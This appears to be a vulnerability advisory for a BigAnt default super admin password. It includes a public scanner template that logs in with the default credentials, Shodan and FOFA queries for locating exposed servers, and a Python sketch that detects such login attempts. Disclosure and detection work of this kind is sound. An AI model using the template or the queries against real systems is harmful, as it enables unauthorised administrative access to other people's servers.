bigant-default-login: BigAnt - Default Password

Date: 2025-08-01 | Affected software: BigAnt | PoC: public

Vulnerability description

Misconfiguration leads to default login into the BigAnt Super Admin account.

PoC code [public]

id: bigant-default-login

info:
  name: BigAnt - Default Password
  author: ritikchaddha
  severity: critical
  description: |
    Misconfiguratoin leads to Default Login into BigAnt Super Admin Account.
  reference:
    - https://www.bigantsoft.com/support/faq/2-4_How_to_switch_login_accounts_System_admin_Security_admin_Audit_admin_super_admin.html#:~:text=How%2Dto-,How%20to%20switch%20login%20accounts%3A%20System%20admin%2FSecurity%20admin%2F,password%20is%20123456%20by%20default.
  classification:
    cwe-id: CWE-522
  metadata:
    verified: true
    max-request: 2
    shodan-query: title:"BigAnt"
    fofa-query: title="BigAnt"
  tags: default-login,bigant,vuln

variables:
  username: "superadmin"
  password: "123456"

http:
  - raw:
      - |
        GET /index.php/Home/login/index.html HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /index.php/Home/Login/login_post.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        saas=default&account={{username}}&password={{base64(password)}}&to=admin&app=&__hash__={{hash}}&__hash__={{hash}}&submit=

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "Login Successfully! Loading..."
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        name: hash
        group: 1
        regex:
          - 'name="__hash__" content="([0-9a-z_]+)"'
        internal: true
# digest: 4a0a004730450221008f40707a1299194ff05324b0141d0db91aa2ff4d804c443e028e1a8e6c3fd97f022022fbbc63c2dd8d23a85d5dc81fa35ba5202e31607257113635a2b2d30a67b706:922c64590222798bb761d5b6d8e72950
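
A detection-side sketch for the login request in the template above, added here as an example and not part of the original template: it flags captured login POSTs that carry the `superadmin` account together with the base64-encoded default password. The record layout (`src`, `method`, `path`, `body`), the constructed sample records and the case-insensitive path match are assumptions.

```python
import base64
import binascii
from urllib.parse import parse_qs

# Values taken from the template; the path is lowercased for comparison (assumption).
LOGIN_PATH = "/index.php/home/login/login_post.html"
DEFAULT_ACCOUNT = "superadmin"
DEFAULT_PASSWORD = "123456"

def decode_password(value):
    """Decode the base64 password field; return None if it is not valid base64/UTF-8."""
    try:
        # parse_qs turns an unescaped '+' into a space, so restore it before decoding.
        raw = base64.b64decode(value.replace(" ", "+"), validate=True)
        return raw.decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None

def is_default_login_attempt(method, path, body):
    """True when a request is a login POST using the default super admin credentials."""
    if method.upper() != "POST" or path.split("?", 1)[0].lower() != LOGIN_PATH:
        return False
    form = parse_qs(body, keep_blank_values=True)
    account = form.get("account", [""])[0]
    password = decode_password(form.get("password", [""])[0])
    return account == DEFAULT_ACCOUNT and password == DEFAULT_PASSWORD

def find_default_logins(records):
    """Return the source addresses of records that match the default-login request."""
    return [r["src"] for r in records
            if is_default_login_attempt(r["method"], r["path"], r["body"])]

# Constructed sample records, shaped like output from a proxy or WAF that logs bodies.
_POST = "/index.php/Home/Login/login_post.html"
_OTHER = base64.b64encode(b"not-the-default").decode()
SAMPLE_RECORDS = [
    {"src": "203.0.113.5", "method": "GET",
     "path": "/index.php/Home/login/index.html", "body": ""},
    {"src": "192.0.2.10", "method": "POST", "path": _POST,
     "body": "saas=default&account=superadmin&password=MTIzNDU2&to=admin&app=&submit="},
    {"src": "198.51.100.7", "method": "POST", "path": _POST,
     "body": "saas=default&account=superadmin&password=" + _OTHER + "&to=admin"},
    {"src": "198.51.100.9", "method": "POST", "path": _POST,
     "body": "saas=default&account=alice&password=MTIzNDU2&to=admin"},
]

if __name__ == "__main__":
    for src in find_default_logins(SAMPLE_RECORDS):
        print("default super admin login attempt from", src)
```

A hit only shows that the default credentials were tried; whether the login succeeded depends on the response body, which the template checks for "Login Successfully! Loading...".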
